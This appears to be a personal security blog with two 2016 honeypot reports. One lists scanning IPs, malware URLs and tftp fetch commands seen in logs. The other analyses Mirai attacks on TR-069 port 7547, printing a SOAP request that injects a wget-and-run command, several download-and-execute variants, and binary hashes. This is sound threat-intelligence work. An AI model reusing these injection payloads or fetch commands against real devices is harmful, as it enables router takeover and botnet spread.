Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 10 Monaten

Samstag, 31. Dezember 2016

Sylvester 2016 - Honeypot report

Happy New Year everyone

I have my Honeypot (https://github.com/johestephan/SendMeSpamIDS.py) running for quite a while now. I take the chance of a new Year to summarize the last weeks in one Sylvester report. The indicators are fetched using the shell scripts out of my toolbox (https://github.com/johestephan/CTI-Toolbox) especially
  • getindiV1.sh - fetch all indicators (see report below)
  • getCodeV1. sh - try to execute all wget calls in a file
have been created to operate with the log files I receive.
This report is also available on X-Force Exchange

Scanning IPs:
=====================================
127.0.0.1
163.172.190.56
185.128.43.174
195.154.179.148
212.175.89.190
23.152.0.18
46.4.90.85
51.15.44.122
51.15.56.205
54.218.98.192
62.210.149.68
81.12.119.27
81.12.121.183
81.12.126.233
81.171.12.232
89.248.168.213
89.248.172.207
92.50.64.234
94.102.48.194
94.102.56.181
HTTP urls (object):
=====================================
http
http://163.21.46.2/appserv/a.txt
http://180.163.113.82/check
http://5.39.93.71/2jvf
http://5.39.93.71/aenv
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://clientapi.ipip.net/echo.php
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
httpheader.net
http://httpheader.net/
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
https://github.com/robertdavidgraham/masscan
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
WGET (objects):
=====================================
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
TFTP (objects):
=====================================
tftp -l 3 -r 1 -g l.ocalhost.host
tftp -l b -r b -g afpen.pw 6969
tftp -l b -r b -g binpt.pw
tftp -l b -r b -g cvfyb.pw 6969
tftp -l b -r b -g gdiqt.pw 6969
tftp -l b -r b -g ixvip.pw 6969
tftp -l b -r b -g jgop.org
tftp -l b -r b -g jzion.pw
tftp -l b -r b -g mrjyq.pw 6969
tftp -l b -r b -g mvtul.pw 6969
tftp -l b -r b -g qplok.pw 6969
tftp -l b -r b -g qrxou.pw 6969
tftp -l b -r b -g vizxv.pw

Sonntag, 4. Dezember 2016

This strange SOAP calls (Mirai)

After the huge attack on Deutsche Telekom I decided to update my Honeypot software and also opened port 7547, which was used in this recent attack, to see what the possible interactions might be. Just some hours after restarting the Honeypot I have seen the first attempts.

POST /UD/act?1 hxxp/1.1
Host: 127.0.0[.]1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml\nContent-Length: 519
<?xml version ="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="hxxp://schemas.xmlsoap[.]org/soap/envelope/" SOAP-ENV:encodingStyle="hxxp://schemas.xmlsoap[.]org/soap/encoding/">
<SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a;sh a`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
I have seen several attempts like this

  •  cd /var/tmp;cd /tmp;wget hxxp://binpt[.]pw/a
  • cd /var/tmp;cd /tmp;wget hxxp://srrys[.]pw/a
  • cd /var/tmp;cd /tmp;tftp -l b -r b -g binpt[.]pw;sh b
  • tftp -l b -r b -g srrys[.]pw;sh b
For at least one I was able to fetch the attempted malware


hxxp://binpt[.]pw/a

Which is a simple bash script which then downloads several other files and tries to execute them.

hxxp://binpt[.]pw/1
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: e1936defa1f093f52c69072f4b192451

hxxp://binpt[.]pw/2
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
MD5: b92b1fe8c3ca945e1739b0ec81ad99b5

hxxp://binpt[.]pw/3
ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
MD5: fd6a1ec4fd8381d525b7de7a2f317079 

hxxp://binpt[.]pw/4
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
MD5: 4a8145ae760385c1c000113a9ea00a3a

Good for us, all files are known on VirusTotal and I also shared them with Avira which not have been listed on VirusTotal. As a result Avira has categorized them as

  • 4 MALWARE LINUX/Mirai.oyagk 
  • 3 MALWARE LINUX/Mirai.bzpfn 
  • 2 MALWARE LINUX/Mirai.upnsp
  • 1 MALWARE LINUX/Mirai.armrl 

This report is also available on IBM Xforce Exchange